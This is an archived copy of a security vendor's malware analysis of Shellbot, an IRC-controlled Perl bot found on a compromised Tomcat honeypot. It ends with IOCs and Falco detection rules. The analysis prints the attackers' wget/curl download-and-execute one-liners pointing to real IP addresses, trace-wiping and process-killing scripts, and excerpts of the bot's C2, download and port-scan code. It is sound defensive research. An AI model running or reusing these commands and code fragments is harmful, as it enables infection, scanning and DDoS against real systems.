{
	"id": "7d1956a2-b694-4ffb-bf76-b820c59b3731",
	"created_at": "2026-04-06T00:06:07.964372Z",
	"updated_at": "2026-04-10T03:21:36.925559Z",
	"deleted_at": null,
	"sha1_hash": "65c74e7fd2079f100dd86a79c2768fee3270fcf6",
	"title": "Malware analysis: Hands-On Shellbot malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2234365,
	"plain_text": "Malware analysis: Hands-On Shellbot malware\r\nBy Alberto Pellitteri\r\nPublished: 2021-11-02 · Archived: 2026-04-05 17:52:49 UTC\r\nFalco Feeds extends the power of Falco by giving open source-focused companies\r\naccess to expert-written rules that are continuously updated as new threats are\r\ndiscovered.\r\nlearn more\r\nhttps://sysdig.com/blog/malware-analysis-shellbot-sysdig/\r\nPage 1 of 15\n\nMalware analysis is a fundamental factor in the improvement of the incident detection and resolution systems of\r\nany company. The Sysdig Security Research team is going to cover how this Shellbot malware works and how\r\nto detect it.\r\nShellbot malware is still widespread. We recorded numerous incidents despite this being a relatively old and\r\nknown attack that is also available on open Github repositories.\r\nWhen the malware is successfully deployed on a targeted system, it may be used for different purposes\r\naccording to the instructions received from its related IRC server, such as:\r\nDownloading several files to persistence.\r\nRunning a port scanning to discover the entire network.\r\nPerforming data exfiltration.\r\nParticipating in a distributed denial of service (DDoS).\r\nhttps://sysdig.com/blog/malware-analysis-shellbot-sysdig/\r\nPage 2 of 15\n\nWhat is Shellbot malware?\r\nShellbot malware enables the attackers to communicate with the C\u0026C server in order to run commands within\r\nthe victim machine. The C\u0026C server, also called the IRC server in this scenario, is able to directly send some\r\nmessages to its victims' machines as a means to keep the communication channel alive and to specify what\r\ncommands they have to run.\r\nIts peculiarity is that the victim machine downloads and launches multiple binaries after the first execution.\r\nMany of them have the same purpose but are conceived for different OS (32/64 bits) and CPUs (arm, mips).\r\nTo analyze the malware, we use our honeypot with misconfigured services to see real traces of different binaries.\r\nLet's begin with a quick overview of Shellbot malware behavior:\r\n1. The entry point of this Shellbot malware was a misconfigured Tomcat application, with default credentials\r\nfor its dashboard management.\r\n2. The first command downloaded initd script that set the stage for the shellbot malware.\r\n3. Once executed, this first script:\r\n1. Downloaded several binaries and scripts.\r\n2. Erased the traces of the new downloads to prevent their detection.\r\n4. Ulimit.sh script tried to increase the user process resource limits.\r\n5. Bash.sh script, instead, continuously loops to check among the sockets for some specific process ID\r\n(PID) to be killed.\r\n6. Finally, some other binaries were downloaded as Perl scripts or ELF files, conceived to make the malware\r\nrunnable over different platforms. These are the real Shellbot malware that forces the victim to\r\ncommunicate with the IRC server, executing and running whatever it wants.\r\nIn our malware analysis, we experienced that the victim container was exploited for the purpose of causing a DoS\r\nto some remote domains, flooding it with thousands of packets.\r\nhttps://sysdig.com/blog/malware-analysis-shellbot-sysdig/\r\nPage 3 of 15\n\nLet's dig deeper into the details of this Shellbot malware to see how it exactly works, and understand the malicious\r\nbehavior to learn how to detect it with open source Falco.\r\nShellbot malware in depth\r\n#1 Initial Access – Hacked Tomcat and the initd script\r\nThe attacker gained access to the Tomcat container, brute forcing its default credentials and spawning a reverse\r\nshell. It ran the following command in order to download the first bash script:\r\nThis script first removed the traces in case it has already existed in the container, and then it downloaded these\r\nother files to be executed:\r\ncd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistax64; curl -O\r\nhttp://192.99.43.212/54545asd5asd45as45/mizakotropistax64; cat mizakotropistax64 \u003ex0000x;chmod +x *;nice\r\n-20 ./x0000x dedicated\r\ncd /tmp; wget http://192.99.43.212/craton.pl -O /tmp/craton.pl; curl http://192.99.43.212/craton.pl -o\r\n/tmp/craton.pl; chmod 777 /tmp/craton.pl; perl /tmp/craton.pl; rm -rf /tmp/craton.pl; rm -rf /tmp/craton.pl.*\r\ncd /tmp; wget http://192.99.43.212/bash.sh; curl http://192.99.43.212/bash.sh -o bash.sh; chmod 777 bash.sh;\r\nnohup bash bash.sh \u0026\r\ncd /tmp; wget http://192.99.43.212/ulimit.sh; curl http://192.99.43.212/ulimit.sh -o ulimit.sh; chmod 777 ulimit.sh;\r\nbash ulimit.sh; rm -rf ulimit.sh\r\ncd /tmp; wget http://144.217.249.55/bot.pl -O /tmp/bot.pl --quiet; curl -s http://144.217.249.55/bot.pl -o\r\n/tmp/bot.pl; perl /tmp/bot.pl; rm -rf /tmp/bot.pl; rm -rf /tmp/bot.pl.1\r\nmkdir /tmp/.logs/\r\ncd /tmp; wget http://144.217.249.55/apachelogd -O /tmp/.logs/apachelogd; curl http://144.217.249.55/apachelogd\r\n-o /tmp/.logs/apachelogd; chmod +x /tmp/.logs/apachelogd; rm -rf /tmp/.logs/apachelogd.*\r\nIt modified the shell configuration file so that it will download the files again when the user opens a new terminal.\r\nIn the end, the malware removed all files, the history, and whatever it had fetched from the IRC server.\r\n...\r\nrm -rf /var/tmp/bot.pl\r\nrm -rf /tmp/bot.pl\r\nrm -rf bot.pl\r\nrm -rf bot.pl.1\r\nrm -rf /tmp/bot.pl.1\r\nrm -rf /var/tmp/bot.pl.1\r\nhttps://sysdig.com/blog/malware-analysis-shellbot-sysdig/\r\nPage 4 of 15\n\nrm -rf /var/tmp/meca.pl\r\nrm -rf /var/tmp/meca2.pl\r\nrm -rf /tmp/meca2.pl\r\nrm -rf /tmp/meca.pl\r\nrm -rf /tmp/mizakotropista*\r\nrm -rf /tmp/x0000x*\r\nrm -rf /tmp/*.sh\r\nrm -rf /tmp/*.pl.*\r\n...\r\n#2 Malware capabilities limitless – ulimit.sh script\r\nThis ulimit.sh script initially checked the $EUID variable as a way to see if the attacker had root permissions.\r\nIf so, it ran the ulimit command that allowed setting resource limits, like the maximum number of user\r\nprocesses ( -u ), maximum scheduling priority ( -e ), and so on.\r\n...\r\nulimit -u unlimited\r\nulimit -s unlimited\r\nulimit -q unlimited\r\nulimit -n 999999\r\nulimit -l unlimited\r\nulimit -i unlimited\r\nulimit -c unlimited\r\nulimit -e unlimited\r\nulimit -r unlimited\r\n...\r\n#3 Stealth malware activities – bash.sh script\r\nbash.sh script looped endlessly to remove any evidence that this attack had existed, and initd script did so\r\ntoo.\r\nIn fact, it printed out all sockets with their process name and process ID, searching for some specific ones to be\r\nkilled with the kill -9 command.\r\nThen, it removed some evidence, slept one second, and looped again.\r\nwhile true\r\nDo\r\nnetstat -anp | grep '666' | awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9\r\nnetstat -anp | grep '107.172' | awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9\r\nrm -rf /tmp/*.arm\r\nrm -rf /tmp/*.arm5n\r\nrm -rf /tmp/*.arm7\r\nhttps://sysdig.com/blog/malware-analysis-shellbot-sysdig/\r\nPage 5 of 15\n\nrm -rf /tmp/*.m68k\r\nrm -rf /tmp/*.mips\r\nrm -rf /tmp/*.mpsl\r\nrm -rf /tmp/*.ppc\r\nrm -rf /tmp/*.sh4\r\n...\r\n#4 The Shellbot core: bot.pl and craton.pl\r\nTo run the malware analysis on our pod, the initd script had initially downloaded binaries, like\r\nmizakotropistax86 and some Perl scripts. By the way, the real purpose of these binaries is the same, so we are\r\ngoing to give a look at the Perl ones.\r\nBot.pl and craton.pl are two identical scripts used to communicate with different IRC servers, via different\r\nports. This Perl script is also available on Github and could be modified by the attackers to customize the malware\r\nbehavior and what the IRC server wants to do, as well as bypass typical blacklist methods to detect malware.\r\nLet's give a look at this script.\r\nStatic code analysis for the Perl scripts\r\nInitially, the IRC server IP and its port are defined:\r\nmy $servidor='192.99.43.212' unless $servidor;\r\nmy $porta='2894';\r\nmy @canais=(\"#spoof\");\r\nmy @adms=(\"r00x\");\r\nThe script also specified how to handle some signals, adding a reference to the signal key value. In this case, using\r\nthe 'IGNORE' value, the process can be able to ignore the following signals:\r\n$SIG{'INT'} = 'IGNORE';\r\n$SIG{'HUP'} = 'IGNORE';\r\n$SIG{'TERM'} = 'IGNORE';\r\n$SIG{'CHLD'} = 'IGNORE';\r\n$SIG{'PS'} = 'IGNORE';\r\nMoreover, the script initially declared the usage of the IO::Socket interface, which provides an object-oriented\r\nway to create and handle sockets. With this interface, it sets the socket first and runs the can_read() method in\r\norder to receive an array of handles ready for reading.\r\n…\r\nmy @ready = $sel_cliente-\u003ecan_read(0.6);\r\nnext unless(@ready);\r\nforeach $fh (@ready) {\r\n$IRC_cur_socket = $fh;\r\nhttps://sysdig.com/blog/malware-analysis-shellbot-sysdig/\r\nPage 6 of 15\n\n$meunick = $irc_servers{$IRC_cur_socket}{'nick'};\r\n$nread = sysread($fh, $msg, 4096);\r\nif ($nread == 0) {\r\n$sel_cliente-\u003eremove($fh);\r\n$fh-\u003eclose;\r\ndelete($irc_servers{$fh});\r\n}\r\n@lines = split (/n/, $msg);\r\nfor(my $c=0; $c\u003c= $#lines; $c++) {\r\n$line = $lines[$c];\r\n$line=$line_temp.$line if ($line_temp);\r\n$line_temp='';\r\n$line =~ s/r$//;\r\nunless ($c == $#lines) {\r\nparse(\"$line\");\r\n} else {\r\nif ($#lines == 0) {\r\nparse(\"$line\");\r\n} elsif ($lines[$c] =~ /r$/) {\r\nparse(\"$line\");\r\n} elsif ($line =~ /^(S+) NOTICE AUTH :***/) {\r\nparse(\"$line\");\r\n} else {\r\n$line_temp = $line;\r\n}\r\n}\r\n}\r\n}\r\n...\r\nFor each handle obtained, the script reads 4096 bytes from the socket, stores them into $msg variable, and\r\nsplits each message by the newline character into many lines.\r\nOnce these lines have been separated, the script calls parse() subroutine on each one to match specific regular\r\nexpressions that will force the bot, and also the victim system, to do whatever the IRC server wants.\r\nHere are some patterns that can be parsed inside each line received from the IRC server, and that encode a specific\r\nexecution to be run from the target system.\r\nHere is the PING-PONG exchange that is used to keep the communication channel alive between the bot\r\nand the IRC server. It also follows an example of how this exchange appears, analyzing the capture with\r\nSysdig Inspect.\r\nhttps://sysdig.com/blog/malware-analysis-shellbot-sysdig/\r\nPage 7 of 15\n\nif ($servarg =~ /^PING :(.*)/) {\r\nsendraw(\"PONG :$1\");\r\n}\r\nThe IRC server can also request to download some specific resources within the victim machine. In this\r\ncase, the machine calls another function to fetch that specific resource, storing it into the file system.\r\nelsif ($funcarg =~ /^downloads+(.*)s+(.*)/) {\r\ngetstore(\"$1\", \"$2\");\r\nsendraw($IRC_cur_socket, \"PRIVMSG $printl :Download de $2 ($1) Concluido!\") if($estatisticas);\r\n}\r\nIt can also ask to perform a port scanning, which has the purpose to contact some specific ports of the\r\ntarget IP or a full-port scanning. The information collected about the open ports will be sent back to the\r\nIRC server.\r\nif ($funcarg =~ /^portscan (.*)/) {\r\nmy $hostip=\"$1\";\r\nmy @portas=(\"21\",\"22\",\"23\",\"25\",\"53\",\"80\",\"110\",\"143\");\r\nmy (@aberta, %porta_banner);\r\nforeach my $porta (@portas) {\r\nmy $scansock = IO::Socket::INET-\u003enew(PeerAddr =\u003e $hostip, PeerPort =\u003e $porta, Proto =\u003e 'tcp', Timeout =\u003e 4);\r\nif ($scansock) {\r\npush (@aberta, $porta);\r\n$scansock-\u003eclose;\r\n}\r\n}\r\nif (@aberta) {\r\nsendraw($IRC_cur_socket, \"PRIVMSG $printl :Portas abertas: @aberta\");\r\n} else {\r\nsendraw($IRC_cur_socket,\"PRIVMSG $printl :Nenhuma porta aberta foi encontrada.\");\r\n}\r\n}\r\nelsif ($funcarg =~ /^fullportscans+(.*)s+(d+)s+(d+)/) {\r\nmy $hostname=\"$1\";\r\nmy $portainicial = \"$2\";\r\nmy $portafinal = \"$3\";\r\nmy (@abertas, %porta_banner);\r\nforeach my $porta ($portainicial..$portafinal) {\r\nhttps://sysdig.com/blog/malware-analysis-shellbot-sysdig/\r\nPage 8 of 15\n\nmy $scansock = IO::Socket::INET-\u003enew(PeerAddr =\u003e $hostname, PeerPort =\u003e $porta, Proto =\u003e 'tcp', Timeout =\u003e\r\n4);\r\nif ($scansock) {\r\npush (@abertas, $porta);\r\n$scansock-\u003eclose;\r\nif ($estatisticas) {\r\nsendraw($IRC_cur_socket, \"PRIVMSG $printl :Porta $porta aberta em $hostname\");\r\n}\r\n}\r\n}\r\nif (@abertas) {\r\nsendraw($IRC_cur_socket, \"PRIVMSG $printl :Portas abertas: @abertas\");\r\n} else {\r\nsendraw($IRC_cur_socket,\"PRIVMSG $printl :Nenhuma porta aberta foi encontrada.\");\r\n}\r\n}\r\nThe two sides can also send \"private messages\" in order to perform data exfiltration, exchange other\r\ninformation, or run more specific commands.\r\n#5 The flooding binary: apachelogd\r\nThis binary was downloaded at the beginning of the Shellbot infection from the initd bash script that we\r\nmentioned before.\r\nIt's quite interesting that the binary remains stealthy until a remote command is received by the IRC server.\r\nAs a matter of fact, several hours after receiving the attack, we noticed this command execution:\r\nAfter that, our container started flooding the domain specified in the command line, always targeting the same\r\nrecipient port but continuously changing the client port.\r\nhttps://sysdig.com/blog/malware-analysis-shellbot-sysdig/\r\nPage 9 of 15\n\nSummary of IOC and suspicious activities detected\r\nIPs \u0026 URLs\r\n192.99.43.212\r\n144.217.249.55\r\n141.95.19.123\r\nhttps://cadastramentoltau.com/\r\nFiles and their SHA256:\r\nInitd\r\n718db42305a8d5b4c3ff74a05037de2f5e679db24bf86b8e88ab34c490699ea3\r\nBash.sh\r\na5e010b0abf603facae5676c2c37f7063f6efc12bc7c863982bff133ec547a3f\r\nUlimit.sh\r\ndb5382c0ef1b204672b4168425d737380288653ac74360b39f1ec466a5a47eb9\r\nBot.pl\r\nd4bbe4087175d3981b2925b77c24baffd8e086c2f9df7179d142e00e7e2ec3ce\r\nCraton.pl\r\n7046260a23088b52debdeb701032db0352323ed26d9816daa4a53222b26ca720\r\nMizakotropistax86\r\n5d6f674a7abab5e60548531a69e6ecb23cc2e2fe823cd7f8ccac6928db5f757e\r\nApachelogd\r\n387099a6c011c0074b9a368a7d3818e3daab0b24527b65d589b583772f5e1c56\r\nSuspicious behavior\r\nA few suspicious activities worth mentioning in our malware analysis:\r\nhttps://sysdig.com/blog/malware-analysis-shellbot-sysdig/\r\nPage 10 of 15\n\nwget or curl commands inside a container at runtime (not build time).\r\nWriting below /tmp folder and giving the execution permissions at run time to new files may be a sign of\r\nfuture malware execution.\r\nFile removal and history deletion can represent that something wants to hide its tracks.\r\nNetwork communication with the IRC server and anomaly outbound traffic over the internet.\r\nOnce we have identified these activities, we see how we can perform their detection.\r\nDetecting malware execution with Falco\r\nThe detection of this Shellbot malware and other generic ones can be done using Falco in order to spot suspicious\r\nconnections or malicious binary downloads and executions.\r\nFalco is the CNCF open-source project, used to detect unexpected application behavior and send alerts at runtime.\r\nYou can leverage its powerful and flexible rules language to match suspicious behaviors, generating event alerts.\r\nIt comes with a predefined set of rules, but you can also customize them or create new ones that fit your needs as\r\nyou want.\r\nHere, you can see some useful custom rules.\r\n- rule: Unexpected outbound connection destination\r\ndesc: Detect any outbound connection to a destination outside of an allowed set of ips, networks, or domain names\r\ncondition: \u003e\r\nconsider_all_outbound_conns and outbound and not\r\n((fd.sip in (allowed_outbound_destination_ipaddrs)) or\r\n(fd.snet in (allowed_outbound_destination_networks)) or\r\n(fd.sip.name in (allowed_outbound_destination_domains)))\r\noutput: Disallowed outbound connection destination (command=%proc.cmdline connection=%fd.name\r\nuser=%user.name user_loginuid=%user.loginuid container_id=%container.id image=%container.image.repository)\r\npriority: NOTICE\r\ntags: [network]\r\n- rule: Modify Shell Configuration File\r\ndesc: Detect attempt to modify shell configuration files\r\ncondition: \u003e\r\nopen_write and\r\n(fd.filename in (shell_config_filenames) or\r\nfd.name in (shell_config_files) or\r\nfd.directory in (shell_config_directories))\r\nand not proc.name in (shell_binaries)\r\nand not exe_running_docker_save\r\noutput: \u003e\r\na shell configuration file has been modified (user=%user.name user_loginuid=%user.loginuid\r\ncommand=%proc.cmdline pcmdline=%proc.pcmdline file=%fd.name container_id=%container.id\r\nhttps://sysdig.com/blog/malware-analysis-shellbot-sysdig/\r\nPage 11 of 15\n\nimage=%container.image.repository)\r\npriority:\r\nWARNING\r\ntags: [file, mitre_persistence]\r\n- rule: Interpreted procs outbound network activity\r\ndesc: Any outbound network activity performed by any interpreted program (perl, python, ruby, etc.)\r\ncondition: \u003e\r\n(outbound and consider_interpreted_outbound\r\nand interpreted_procs)\r\noutput: \u003e\r\nInterpreted program performed outgoing network connection\r\n(user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline connection=%fd.name\r\ncontainer_id=%container.id image=%container.image.repository)\r\npriority: NOTICE\r\ntags: [network, mitre_exfiltration]\r\n- rule: Container Drift Detected (chmod)\r\ndesc: New executable created in a container due to chmod\r\ncondition: \u003e\r\nchmod and\r\nconsider_all_chmods and\r\ncontainer and\r\nnot runc_writing_var_lib_docker and\r\nnot user_known_container_drift_activities and\r\nevt.rawres\u003e=0 and\r\n((evt.arg.mode contains \"S_IXUSR\") or\r\n(evt.arg.mode contains \"S_IXGRP\") or\r\n(evt.arg.mode contains \"S_IXOTH\"))\r\nexceptions:\r\n- name: proc_name_image_suffix\r\nfields: [proc.name, container.image.repository]\r\ncomps: [in, endswith]\r\n- name: cmdline_file\r\nfields: [proc.cmdline, fd.name]\r\ncomps: [in, in]\r\nvalues:\r\n- [[\"runc:[1:CHILD] init\"], [/exec.fifo]]\r\noutput: Drift detected (chmod), new executable created in a container (user=%user.name\r\nuser_loginuid=%user.loginuid command=%proc.cmdline filename=%evt.arg.filename name=%evt.arg.name\r\nmode=%evt.arg.mode event=%evt.type)\r\npriority: ERROR\r\nhttps://sysdig.com/blog/malware-analysis-shellbot-sysdig/\r\nPage 12 of 15\n\n- rule: Outbound Connection to C2 Servers\r\ndesc: Detect outbound connection to command \u0026 control servers\r\ncondition: outbound and fd.sip in (c2_server_ip_list)\r\nexceptions:\r\n- name: proc_proto_sport\r\nfields: [proc.name, fd.l4proto, fd.sport]\r\noutput: Outbound connection to C2 server (command=%proc.cmdline connection=%fd.name user=%user.name\r\nuser_loginuid=%user.loginuid container_id=%container.id image=%container.image.repository)\r\npriority: WARNING\r\ntags: [network]\r\nYou can check the full rule descriptions on GitHub.\r\nThese Falco rules can detect suspicious outbound and inbound traffic, with or without interpreted programs, like\r\nperl. They can also spot other common behaviors that this Shellbot malware adopts, like giving execution\r\npermission to the downloaded files or modifying the shell configuration file.\r\nDetecting with Sysdig Secure\r\nThe Sysdig Secure DevOps Platform is built on top of Falco and can also be used to detect this attack. For\r\nexample, DevOps can:\r\nCreate a policy to detect any destination IPs or ports which are not in the white list.\r\nCreate a policy to detect any binaries and scripts launched which are not in the allow list (e.g.,\r\ncraton.pl,bot.pl , etc .).\r\nCreate a policy to detect any execution by interpreted programs, like Perl, if it is not expected.\r\nhttps://sysdig.com/blog/malware-analysis-shellbot-sysdig/\r\nPage 13 of 15\n\nThe c2_server_ip_list can be filled with the malicious IP that we found.\r\nMoreover, you can also prevent any of these behaviors, killing and restarting the involved systems when your\r\nFalco rules are triggered.\r\nConclusion\r\nThe Sysdig Security Research team dug deep into Shellbot malware architecture and malicious activity to\r\nimprove the detection systems.\r\nhttps://sysdig.com/blog/malware-analysis-shellbot-sysdig/\r\nPage 14 of 15\n\nWe covered a counter-trend malware that can compromise your system, giving the attacker the possibility to\r\ndownload new files, open connections, leverage your machine to launch DDoS attacks to a specific target, and so\r\non.\r\nSo, the system administrator must always adopt tools in order to detect suspicious behaviors and anomalous\r\nconnections. Thus, they can protect the integrity of their environment, and keep all the services and software up to\r\ndate to avoid becoming a zombie system.\r\nIf you would like to find out more about Falco:\r\nGet started at Falco.org.\r\nCheck out the Falco project on GitHub.\r\nGet involved with the Falco community.\r\nMeet the maintainers on the Falco Slack.\r\nFollow @falco_org on Twitter.\r\nAt Sysdig Secure, we extend Falco with out-of-the-box rules, along with other open source projects, making it even\r\neasier to work with and manage Kubernetes security. Register for our Free 30-day trial and see for yourself!\r\nThe Sysdig Secure DevOps Platform provides security to confidently run containers, Kubernetes, and cloud\r\nservices. With Sysdig, you can secure the build pipeline, detect and respond to runtime threats, continuously\r\nvalidate compliance, and monitor and troubleshoot cloud infrastructure and services. Try it today!\r\nAbout the author\r\nTest drive the right way to defend the cloudwith a security expert\r\nSource: https://sysdig.com/blog/malware-analysis-shellbot-sysdig/\r\nhttps://sysdig.com/blog/malware-analysis-shellbot-sysdig/\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://sysdig.com/blog/malware-analysis-shellbot-sysdig/"
	],
	"report_names": [
		"malware-analysis-shellbot-sysdig"
	],
	"threat_actors": [],
	"ts_created_at": 1775433967,
	"ts_updated_at": 1775791296,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/65c74e7fd2079f100dd86a79c2768fee3270fcf6.pdf",
		"text": "https://archive.orkl.eu/65c74e7fd2079f100dd86a79c2768fee3270fcf6.txt",
		"img": "https://archive.orkl.eu/65c74e7fd2079f100dd86a79c2768fee3270fcf6.jpg"
	}
}